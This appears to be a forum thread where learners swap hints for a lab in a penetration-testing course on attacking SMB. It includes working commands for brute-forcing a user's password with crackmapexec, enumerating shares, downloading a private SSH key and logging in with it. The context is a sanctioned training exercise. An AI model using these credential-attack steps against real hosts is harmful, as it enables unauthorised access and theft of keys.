ATTACKING COMMON SERVICES - Attacking SMB

Hello, guys!
I’m having trouble in the final question of this module, I already found jason’s password and now it asks me to connect to ssh and retrieve the flag.txt. However, when I try to connect to it, like I did for the topic before (Attacking FTP), I get a “Permission denied (publickey)” message.
I also found a id_rsa key in the smb attack, but it is empty

I actually managed to do it right now, I was typing ''GGJ\id_rsa" instead of “.\GGJ\id_rsa” in the --download flag and somehow it was downloading an empty file

1 Like

Not sure whether you still need any advice on this box, but I guess it might still be helpful for others who come in the future :slight_smile:

  1. Check which door does the password fit into. The way to use the keys might not be as direct as in Attacking FTP.
  2. once you have the correct password, you can download the file with corresponding username. The format could be a little tricky but I believe you can find your way in a few attempts. (in fact, the material gives very nice examples)
  3. Empty file means that the download is not successful. If the file is successfully downloaded, it gives a pretty delightful sign as shown in the material.
  4. you might need to look around on the internet or other modules for the last step to completion. There are plenty of tutorials out there that shows how to use the “thing” you got correctly. Once you figured out what to do, you’ll find that it’s actually kind of straight forward.

Hope this helps and have a nice day!!! :stuck_out_tongue_closed_eyes:

I am stuck here probably because I am a morron.
I want to find out Jason his password, but when I try to do it with crackmapexec every username and password combination i use is correct. I believe this is because the share allows NULL sessions. How can I make is try to actually check for correct credentials?

2 Likes

Oke yes I am a … I used the other services running to get the correct credentials…

Hello, how did you manage to find Jasons password?! Im bruteforcing with the resource password list but it`s not there…

Hello,

Can you provide a hint how to obtain password for Jason, please? I got the password.list file and used it with CME (-u jason, -p password.list) but no luck. Also, tried it with FTP - same deal. Any help is greatly appreciated. Thanks:)

Try using other services and applications with the supplied password list

Big fu*king fail for me is that i didnt use full path and didnt input domain.

My first attempt was following:

sudo crackmapexec smb 10.129.241.245 -u jason -p pws.list

ending abruptly with:

SMB         10.129.241.245  445    ATTCSVC-LINUX    [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:) (signing:False) (SMBv1:False)
SMB         10.129.241.245  445    ATTCSVC-LINUX    [-] \jason:pws.list STATUS_LOGON_FAILURE

It took me longer then I would admit to figure out why is CME not going through all the passwds.

Next mistake was that the DOMAIN is empty. Running

./enum4linux-ng.py 10.129.241.245 -A -C

as stated in the module, you will find the domain name you are supposed to use.
So the final command should look like this:

sudo crackmapexec smb IP -u jason -p FULL/FING/PATH/TO/LIST -d DomainName

TBF it would be nice knowing this little details beforehand, explained in the module for instance. Fact that this version of CME is doing such a poor job with handling files and documenting it is one thing. But for no one pointing out that CME may fail retrieving domain info automatically (doesn’t even inform you that it failed) and because of it failing the whole attack, that just feels like wasting time.

5 Likes

thanks! I forgot to add the domain to the username as well

As a guide.

  • For question 1, use the smbclient tool.
  • For question 2, use the crackmapexec tool and the --local-auth parameter and the dictionary provided by HTB in resources.
  • For question 3, you must download the file located in G** (smbmap -H 10.129.219.167 -r G**), use the smbmap tool and add the corresponding credentials of jason to get the permissions to download and read the file.
    Do not forget to give the appropriate permissions (600).

i tried this and this doesnt work for me can you elaborate or dm me please

Question 1: smbmap -H ip_address
Question 2: crackmapexec smb ip_address -u ‘user_name’ -p pws.list --local-auth

Note: pws.list can be found in the resources section (HTB academy)

Question 3: smbclient '\ip_address\share -U ‘username%password’
smb: > get file

OR, alternatively: smbmap -H ip_address -u username -p ‘password’ --download ‘share\file’

chmod 600 id_rsa

ssh -i /path/to/id_rsa username@ip_address

Problem

ssh -i id_rsa jason@xxxxxxxxxxx
jason@xxxxxxxxxxx: Permission denied (publickey).

Solution

ssh-add id_rsa                                   
Identity added: id_rsa (jason@attcsvc-linux)

:heart: